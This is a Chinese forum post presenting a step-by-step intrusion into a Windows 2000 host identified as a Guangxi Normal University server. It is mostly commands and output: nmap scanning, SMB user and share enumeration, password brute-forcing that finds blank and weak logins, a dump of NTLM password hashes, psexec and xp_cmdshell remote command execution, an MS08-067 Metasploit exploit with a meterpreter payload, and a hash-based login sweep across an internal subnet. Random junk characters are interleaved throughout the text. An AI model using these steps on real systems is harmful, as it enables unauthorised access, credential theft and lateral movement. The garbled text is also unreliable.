广西师范网站http://202.103.242.241/
, l0 V, f, s$ j! P( S6 @( a2 }. r9 x' U
root@bt:~# nmap -sS -sV 202.103.242.241
3 v- ]( w7 U+ S# {: X. e5 a( A
, [! F& _6 B& z$ a6 WStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
% k; L$ ]+ @9 Y" D& Z
+ o7 L* `# R7 F) a; ?, pNmap scan report for bogon (202.103.242.241)
3 l# \2 X( l% L$ q6 F! C7 j. s& y! T4 ?) f( x: V& O
Host is up (0.00048s latency).* i( R1 G/ H% K3 g+ I
8 @2 X6 a! ^+ H U5 { z$ wNot shown: 993 closed ports; M* F/ J0 J: B6 O
6 ~$ {+ b9 t/ q R" q- V/ q
PORT STATE SERVICE VERSION
8 s& N; @8 d l( H& g. ?& P
6 p1 x R9 K B. A135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
, _% d8 \2 u+ Y( X5 c: c; \' J+ P- }( v
139/tcp open netbios-ssn6 s4 I4 q2 {; v7 K4 D
7 f1 Y% l- x \* ?" M+ Q+ u" W445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds7 q3 f8 b- T/ T
p/ M. t+ x F6 C8 c1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
7 ^( ?& S! V# `9 E' a" t1 h7 r+ ]0 {7 A, m6 Q. u8 K
1026/tcp open msrpc Microsoft Windows RPC# L. Y9 s, K, S" w1 @
& H# ~2 m, y$ a9 r2 z
3372/tcp open msdtc?
: G$ F5 e9 t2 q# B$ q
0 s& Y% O: x( I, A3389/tcp open ms-term-serv?
. S4 c: a/ U4 v5 `8 y$ |# G
4 i# |: W8 v& x" }! q/ v( o% ~! i1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
$ Q( q& q1 o; q8 K1 z1 w; zSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r) L1 W3 s: ~# j, i* }
" |$ g! I) {! j5 m5 W% x
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions. A. |" V- i3 y1 j
, f* E" p3 Z; L8 t5 U- s3 BSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
+ o3 ]8 |8 W9 i4 b: c1 M2 ~% i1 o1 `5 B+ z& S9 G. R8 P$ f" O
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
: }% g7 h+ R$ d+ N4 C/ i& ?- ]4 U. `- w x8 a
SF:ptions,6,”hO\n\x000Z”);
! E1 Q8 Q) T- }& J
2 S& n: ?; @% F- s2 f9 hMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
U) B w% n4 d. f+ j1 f
% a" L- k, Y% v# Y0 Q/ [Service Info: OS: Windows
$ w; j9 C$ l0 B/ o" o5 h+ |$ z1 p# t
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
! s: J# }0 E" s0 a1 e9 }3 R1 Z: f f M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds0 @8 q- z- ^2 F2 x1 h' o8 Q
, J$ }3 V; }$ G) i9 Uroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本9 u; [0 @& z% K$ h" C/ K# \
1 a/ o# f" |" d7 r, o! l, [-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
) z" @7 N3 d& L2 ^; O! ]; u" u) U0 b) H; n
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
& ^% L7 p1 N! N) p- z# e3 I# O2 s( a4 g! [/ Y7 `& \0 a
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse+ q0 X6 K& |& W3 z: w. u' f
+ N- U( [9 }, O% Z9 J! ^
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
: J) C% c/ n/ K6 M n9 v# X' W% s5 w9 \" O5 ~3 a/ m
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse: z4 F! Z& v r5 |
0 ^. w1 V9 d$ ?0 Q8 v; e& X-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse$ a5 Z" ~ _9 B( D/ O# t
+ u, o8 Z% ]' d$ w! p* g2 n-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse$ E& k) l! L k0 U$ C3 O
" K7 H$ y) f, T" ^5 \-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse( f. S+ t8 j; ~
~/ n3 r* U$ P; J' \: x* f
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
2 n4 A$ h' p( X! S; `3 s1 d& |+ K/ i2 ^" S3 g+ k) y
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
$ `7 K0 c8 f8 i- o( k$ G7 g$ i( f$ ^& t. K5 ~
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
4 D9 q2 ]6 y; D& V- b
. Q8 s- {. \( @. O- M! R-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
$ d7 M: n P/ A0 y# F
0 v% ?/ C z# S3 a0 ~* r9 C-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
. h+ w/ I9 n0 H( ]- v3 r; L7 {
# [4 @+ R% C- Q4 K; x-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse/ n8 _& G$ X7 R) w0 q
& [' x( A6 R# c) j5 B
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
" ^& K, i/ s. t, {- \+ V% j
+ m. O4 {# }" }7 @) C) t& ?root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
- e2 c, M5 P: P/ F, U* ^" N
5 j e R8 p0 O9 m- j( V+ C//此乃使用脚本扫描远程机器所存在的账户名9 x, Q* N' u6 X! {1 o% R. ~
$ z9 c: _, M; R( ]( I8 F# i% i
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST9 @/ R# s, |4 c' M! l8 J5 L
( [' z+ `$ N4 r
Nmap scan report for bogon (202.103.242.241)
( v: z; V7 n. q1 t$ R& @' b' \4 G7 t" ?$ l
Host is up (0.00038s latency).+ ?. b( {* Q% ]: `% r: d
% ^ {6 ~" R, |1 ONot shown: 993 closed ports
( q8 M, P: U+ }! t; P4 L. ?) L* R- ~( |( Q# `$ e% j; k5 G% v
PORT STATE SERVICE. E3 j0 B/ x& B& G6 `/ C
' ]# q/ t6 z, G6 D1 K& @- h8 f
135/tcp open msrpc
; n: x7 e* \6 s( c) y
' S3 `, u$ i7 \) E# l139/tcp open netbios-ssn
* O4 M. X* [8 ]( j+ r3 m$ l) c+ @$ D' X3 |
445/tcp open microsoft-ds- l6 S7 p" G/ t- m/ K
1 c9 J* Z% E, L; V: }, H: @- A
1025/tcp open NFS-or-IIS: s2 C; L5 ]6 z% l$ N7 z: _8 K
* S7 T0 @0 ]! g! j
1026/tcp open LSA-or-nterm/ B9 {3 E4 G/ _0 [% g: ?, B
! h2 y4 ?' I3 M2 d
3372/tcp open msdtc
. Z. u/ I0 J2 a5 Z% C( S) a( `9 O9 D0 r# J- {/ I0 j; q
3389/tcp open ms-term-serv k$ H2 M4 f+ }$ C2 ]
& S2 E; H7 t( |, L% B' s
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) f& ^/ X$ G1 x* _& N
0 R9 d7 x" i- }
Host script results:7 d: ]0 w" x" ]0 L6 g
& {6 X" {" M# Z| smb-enum-users:; K0 {# f" s7 Q0 c5 T$ U
8 B1 [4 O! R# ?
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果0 r+ |! D# F% B" r
" c! a! Q: b. x4 {3 ?$ @3 v
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
6 m1 m5 f* d: v9 X0 t0 Z
) z1 o/ I* A1 B1 L$ _/ u3 `4 ?$ s( Zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
! `) v' B; Y& W! D Y4 L& L; T& z- Z3 Z% I! u
//查看共享
4 I* V, z. h# {! u. ?' k- r' M1 ]& v" K6 ^! v
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST- ~4 V2 D- E+ V6 A: S
9 X3 T# ~5 X2 aNmap scan report for bogon (202.103.242.241)/ q% {9 f7 B) N, W+ M z
" j6 b( F: B; J' d0 o" B$ C$ ^Host is up (0.00035s latency).
' D2 a# v& x1 B9 K4 |+ d! C# h* S6 Y# ^" S* v$ Q- P- P
Not shown: 993 closed ports
^1 t4 a- w) r) s6 ~. P+ a3 o' N4 N- J, n
PORT STATE SERVICE
5 G' v: _2 D* _9 c/ x5 E
( s/ _+ k. r' J6 |' b3 f135/tcp open msrpc
. t- m$ S# C3 k8 b. M
6 `/ D4 J4 J1 t+ s139/tcp open netbios-ssn7 \5 \, `- k k b5 \% i8 }
" W$ L: t9 n: ~: r; s445/tcp open microsoft-ds( Q& Z! ?+ c+ A6 q
6 F6 L3 H* z6 C* U1025/tcp open NFS-or-IIS
* G& r6 W2 a v$ |) ] J& U( y/ Y
1026/tcp open LSA-or-nterm
1 J8 h+ X" d+ [3 f- V' x: ]+ o( x& l p- g( ?
3372/tcp open msdtc/ L% G6 H2 [6 g1 r- K! s: y. y. W
# ^- B) }/ N% [% G3389/tcp open ms-term-serv
2 x1 o% n) `% i; `
) n) }# ]& J7 P1 Q) ?MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( X: C. N4 E! e6 L f+ B( j) S) ~! |5 v& d$ b2 U% }
Host script results:1 V( t5 {3 M$ s: w
& I3 w% x9 S+ l& |' K- `3 _9 C5 l2 B| smb-enum-shares:
' A1 }! } C8 O+ E& ~2 S( k: ]7 m0 S; c& F! S6 ?/ t8 r
| ADMIN$% j) l3 T p- d( P5 D
; `7 ? x* {8 T& H. Q( o! ?* s| Anonymous access: <none>
. t( h+ E; r- j n
) R' G6 F) O) e" r- z) _| C$
3 f0 f7 y# f/ X
: h$ C4 {8 ^5 b* R7 }7 C) }* f9 z| Anonymous access: <none>
9 p4 Z5 _4 i, f* ~" X, R7 l. c6 E( k5 Q w. I& h
| IPC$
; s6 g( ]4 F' k' w \
6 H* a' J2 W0 A3 f0 c|_ Anonymous access: READ
' s/ h/ A- O* W# A+ c. F; K
! x8 \% [/ ?; SNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
4 n, j6 a q/ V8 t6 o. |7 ~& ?& b; u$ U, L( ?
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 5 M0 i7 Z* l( j0 L, T
N& j) l" X, O5 V2 k//获取用户密码8 {8 C0 h( ^* b0 @1 V K( U( p5 X
2 X" x- k3 k! w- |
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
) V/ l5 G) Y; H, A6 Y1 b/ ?3 e
' ^) V. U: x! V, ~7 z, ?' e, mNmap scan report for bogon (202.103.242.2418)- g* u! R% a N* q1 l& R
7 ]% y+ A' h' g2 H+ \4 JHost is up (0.00041s latency).3 S* h; C/ z! y& n
' `; z1 @& N1 @5 ^1 A4 i
Not shown: 993 closed ports* u7 N- G- D' }2 i% Z
0 j0 E4 S( J# ^/ o
PORT STATE SERVICE3 E% ]$ |4 }1 h( u8 D
6 V5 r- l5 D* c# ?& z
135/tcp open msrpc" D0 h$ g8 O* ^8 y! Y0 e2 W# q8 x
3 s6 r1 o7 F: P7 _3 }. K- p139/tcp open netbios-ssn
& t6 ? z! |! z$ j4 { C) r/ F
' @, R. K+ |: E+ a445/tcp open microsoft-ds$ Z. [) k7 ^3 r* j
- ]9 Q% S6 X" y! b! j. B& l! @1025/tcp open NFS-or-IIS
3 m- Z4 e; V+ C( s& H! ?
3 c* @+ p$ s! B8 t5 h7 v1026/tcp open LSA-or-nterm# H- L4 Y8 K8 s/ p' B) u( P
: V) P% S- d: V$ I0 p4 K3372/tcp open msdtc
: U) u$ |) m6 X5 S- R" [" G5 J. ~# a7 S
3389/tcp open ms-term-serv6 p0 A; U! x0 J* r3 y
1 a# r; J- N$ |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
( q- V4 B* ]& V0 E2 f) t" A# o- j& c: q. Y# {, L. D0 [
Host script results: F: Q& M* ?6 e/ ]* Y
# \7 J8 e" |' a) i. f# Y
| smb-brute:
3 K! O4 f$ ^8 b( ^" L9 V: ~ Z+ E- V
administrator:<blank> => Login was successful9 L2 S& w4 ?8 M
3 e) i; W- q' ?7 H1 m
|_ test:123456 => Login was successful! k" V' F5 \0 t9 O4 D6 y
! ]4 J! @# t8 W ]* ~- @
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
% U( @# N x. u# n, _
- F" k& s) y" O% qroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash, E- p: {7 g9 G' j0 D4 M
; F; K/ y3 m2 f a' R2 jroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data' v; G8 k; w4 L8 w' {4 c% D
_+ {0 D+ V X0 E
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse7 M9 J( {: e) P2 f6 K( B. X) i
& T, d$ j/ m! F) x Y
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1392 D; K- S5 {. v# m# P1 u8 z; p
4 w: t l( p2 v# Z+ i3 @( ]5 P
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
, P- R1 u, a+ n8 O: v
) |; m. Q g8 f1 B7 a6 NNmap scan report for bogon (202.103.242.241)
2 S8 U! B8 a2 L. Y5 ^" q6 u! e) n2 F1 I5 Q* U: Z2 ^0 `' ^
Host is up (0.0012s latency)." W6 R b; h5 s# c* A! E* R
, A! a6 V; N3 Y8 y3 r
PORT STATE SERVICE; _3 E$ B; U* v7 v& U
4 U" g" i2 s3 x4 `+ B135/tcp open msrpc, Q& e- K. ]2 l8 K
2 C' ?, r$ _( p' R$ U+ z) u
139/tcp open netbios-ssn
! T t. m' ^) L; C2 }# X( P7 B8 b! ?$ R# N& `7 E
445/tcp open microsoft-ds
. A+ D4 i/ }! V' J4 R' e: O+ B y' c/ S" Y- T6 b
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& \' D. ^* S2 R- C' t0 u
! ]( ^0 ~* I; D0 zHost script results:- G. g: H! g. ]5 o
" g9 w B g2 h- _' e% J
| smb-pwdump:4 ^1 A* ^9 x5 r2 W2 t
6 R7 R1 Y' F+ _0 q7 v9 @% c( R
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************& ]( s6 a: Y' f
" F, @' C& i; w( L' F1 I1 y3 x: \| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************1 q! o6 X* k2 R9 h) ^0 h- q6 J# S( R9 ]
% X. s- \6 L: f# J4 c7 I( @
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D47 s7 Y( k1 G& s. O/ h
# U; u) p$ \) h+ v. U# R" o|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D25 g6 L- [2 ]( o& x+ {4 U
1 c; e) P2 j1 [$ l+ {' O/ {
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds6 J& h `* A& C) Q) m K$ x# i) ^2 o
/ t& H0 l; y2 X/ x4 q( L; jC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell! f" s# b! M5 w5 T! ^
9 L+ X( i7 b3 u. k-p 123456 -e cmd.exe
: S% R8 |# W: I- S6 \/ }/ d! G# ~* `6 B3 t
PsExec v1.55 – Execute processes remotely" K. K5 k+ G2 t. R
! ?9 T8 l! f+ b" y) J Z# n o
Copyright (C) 2001-2004 Mark Russinovich( z9 c M% B; N, L* V1 N
, b4 o2 @- u0 H/ I2 DSysinternals – www.sysinternals.com
% [& \( X8 G1 a$ B) L* \: O
4 P y9 ^$ _/ x; w. J; S0 i% UMicrosoft Windows 2000 [Version 5.00.2195]
3 m9 p7 ^0 c) N( {" n4 T4 O8 H
6 X0 d6 k* Z L4 D% G6 v(C) 版权所有 1985-2000 Microsoft Corp.; ^7 l- \9 M3 t$ X- g( I
0 r0 b% \8 h$ x# R6 `
C:\WINNT\system32>ipconfig
5 m% D5 }2 D% q1 C
! O8 Q0 N; j, Y kWindows 2000 IP Configuration
$ L: r. S& O1 i6 r. y( T
' F4 a# P* e5 w8 C3 DEthernet adapter 本地连接:' `) L( W5 f% N
0 Z3 y# ~" u" V. c% u; O4 g( |
Connection-specific DNS Suffix . :
/ p( M- P. z. y4 m7 j& T* j
4 M8 f4 s( C1 } H5 @' g& U% RIP Address. . . . . . . . . . . . : 202.103.242.241
+ M" F! |1 q7 c1 s
# @7 u7 S9 u. g% o' uSubnet Mask . . . . . . . . . . . : 255.255.255.0
3 }5 U# e2 K- U3 y( R* B* W4 w2 G: \5 R4 @8 s& i* i4 ?" H# o
Default Gateway . . . . . . . . . : 202.103.1.1( u) A1 ~; h. Q4 f) I3 n
+ G9 C! T9 D. p! jC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令: c( w* l: [- m$ Y+ w" f$ [
. c0 P/ q% N) \' o- v5 |root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞4 ]: o- a5 A/ a; O& D. y
& R& k. I- v. e+ ~' b0 i( gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST# p+ n4 r* D0 F/ L# E+ Y4 ^' Y7 ^
9 f! {& ]2 s3 q. a% K% ZNmap scan report for bogon (202.103.242.241): P* W2 _' B" v
% X, i) F8 `4 F4 q8 B! b6 Z. \; l/ q6 gHost is up (0.00046s latency).
" x. N! a( ^" k8 ^/ w. R2 F/ u, v6 B; L2 s, s
Not shown: 993 closed ports, W; Q+ ~7 J4 B+ {
9 z& c" l* z4 @7 k" Y4 v. h: BPORT STATE SERVICE% X/ z8 ~: o8 e* `6 i
2 G, g; X: Q [6 D& y% f
135/tcp open msrpc) h& O1 c% L: P# L F' Q
4 v8 u' R( E- F$ r3 {, X) Q$ Q139/tcp open netbios-ssn h/ }2 g* ?4 ~- d O2 ^
+ S% M( j1 d3 y4 h" }) F# ?445/tcp open microsoft-ds
4 N: Y. c! }6 ]* m0 t) t* S( ^/ b2 F0 j' P% A
1025/tcp open NFS-or-IIS0 \; Y" r( C- ?/ n8 v' f( k
( g j n1 k. U0 j- j/ Z' Q
1026/tcp open LSA-or-nterm! k1 Z3 ` `6 Z# [/ R
4 D' u% z* o0 j) G* O# |3372/tcp open msdtc/ p' }8 C: D1 a, |) B
7 P+ e q( C6 B) B8 q3389/tcp open ms-term-serv
. B3 M- S, Y7 h6 g/ o
' c0 Q& r3 p' IMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
- _6 F9 |; D, k' N1 }* p/ n4 p
& m$ o& n3 U) c3 j% A. X! s5 yHost script results:/ |" _) P7 s/ P) U$ b* u; g8 x
/ d- K& J( L5 `# {- p% j| smb-check-vulns:( G. a( |: s, v6 b
8 O9 ?' Q+ H, n4 y
|_ MS08-067: VULNERABLE" s0 |- `9 v5 R1 m8 E) u' u7 ^
8 L0 K& S1 |- x$ Q5 N
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
1 h, N) E& k$ l$ M2 v5 K. k# U9 o6 t5 o+ j
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
+ d/ N7 e8 p! G) |- b" K2 L/ a* `$ G! z
* C6 B+ n2 o) d: D! }& Emsf > search ms081 s: |0 E- q' W
/ {; c; M4 q1 Y: imsf > use exploit/windows/smb/ms08_067_netapi
0 `+ o5 U( }6 d$ ]( z
?! a, p, m4 E/ j) F0 b4 f6 F1 Rmsf exploit(ms08_067_netapi) > show options( Y1 q2 \! S" b3 M6 n
\7 l9 z% H$ B/ ]6 u% V/ m& w c" @3 Umsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 z j: ]* f; [$ q V n% Q3 d V8 ~2 ?8 S( j" B) T$ x
msf exploit(ms08_067_netapi) > show payloads
1 `" T2 K, p8 g9 c7 m; Q6 U. f/ B9 C8 s6 O r9 u
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
- |% T2 ~ q/ B; M% {
( k( ^1 W% z* A" ?3 M0 \msf exploit(ms08_067_netapi) > exploit
8 }$ q! S/ Q, ]" A3 @
- z1 [1 c% f' R0 L3 M3 ?1 Tmeterpreter >. d& V& U. t( K/ r
$ V+ c6 \$ l0 o: l; y7 Q, C$ JBackground session 2? [y/N] (ctrl+z)1 o* u- y8 H& e7 B" z
3 w" ]3 w1 w. Z7 ?7 n4 Rmsf exploit(ms08_067_netapi) > sessions -l8 l9 T# [: W. T B0 f
4 s+ V! X4 |8 ^5 C+ ]3 z
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt$ n! i; z1 a" o3 Q; ]/ [1 _
7 T0 S0 u2 z- X& htest
' \, c$ U' G( u0 B9 e s8 i0 X) l: Y: V% T) F5 D- K
administrator
' X" I" u$ u' \2 f9 h' h2 H" _4 ]/ x H
root@bt:/usr/local/share/nmap/scripts# vim password.txt
, e2 U% z" c2 S0 L& D6 {+ e' G: c3 C' p+ A
44EFCE164AB921CAAAD3B435B51404EE& `# Z- d5 F) O! [- B+ t# i$ D
7 p4 A( k# J. R! L% b+ N0 ^
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 0 j4 g$ J5 G8 R% ]8 U0 r
& J3 ^8 r& {+ c4 [$ | T //利用用户名跟获取的hash尝试对整段内网进行登录
& k* m% x% H3 X6 x) }1 E9 U j
% t7 ]4 o. Y1 {7 U ]1 BNmap scan report for 192.168.1.1050 G% a9 N6 _" t7 I! J r
* P( _6 l9 ` `$ x7 O) S2 f, ]Host is up (0.00088s latency).
7 U0 O6 y1 r5 ]3 G9 T# L" \/ q- c- i( A6 P
Not shown: 993 closed ports( C! v2 E5 g" ^0 I- z8 X8 Z3 q9 W
. z) N- P7 p2 u- }5 R9 O( D/ Y2 hPORT STATE SERVICE! s8 Z4 A: C# {1 G
" g; L9 u0 L8 ?135/tcp open msrpc
) B7 f& `& J: C$ f* A7 q% w! k9 \
! t4 M% H% R6 L" g# c' K, \$ z139/tcp open netbios-ssn
$ f* a6 f5 n' `- }' @0 v' ]
- P% |) r: U9 x; i" j445/tcp open microsoft-ds7 x+ H! I5 H, Q. L. X0 \
9 v, ^+ e" w7 J5 n1025/tcp open NFS-or-IIS
) o6 g) E9 o6 }5 \; l, @1 s2 Q* j/ X0 q7 ~9 i$ w2 d" Z
1026/tcp open LSA-or-nterm
( g; v, {- F* J" \9 ^0 g. [
. ^* C1 k4 B6 @ k, ]2 e* U3372/tcp open msdtc
& P7 a2 O4 f6 h+ E6 C
/ n3 @% s+ p( I! a2 S# W& k3389/tcp open ms-term-serv
0 k( p" q; A* L8 U. {3 n1 @8 \
# Q9 @, ~ ~) s. {0 {MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 d* B/ @/ S8 Y+ R% v
' J3 t$ T; I2 @: T, S$ R' Z0 lHost script results:
, t6 O3 X% g: F
, J) q7 o3 O# u Y; H| smb-brute:/ B" i0 K6 ]; Y* M! L. Y
% N+ f; V/ @1 L0 E9 f|_ administrator:<blank> => Login was successful1 A( w) C) X# E2 F' {; `* m$ F3 R
0 ~! H P, X j9 k& z S
攻击成功,一个简单的msf+nmap攻击~~·
# g% A& x$ ~ w! C$ g: \6 i4 U
# D5 Q5 b& h0 }& a! Q6 L# s0 X8 E |
发表于 2012-12-4 12:46:42
收藏
支持
反对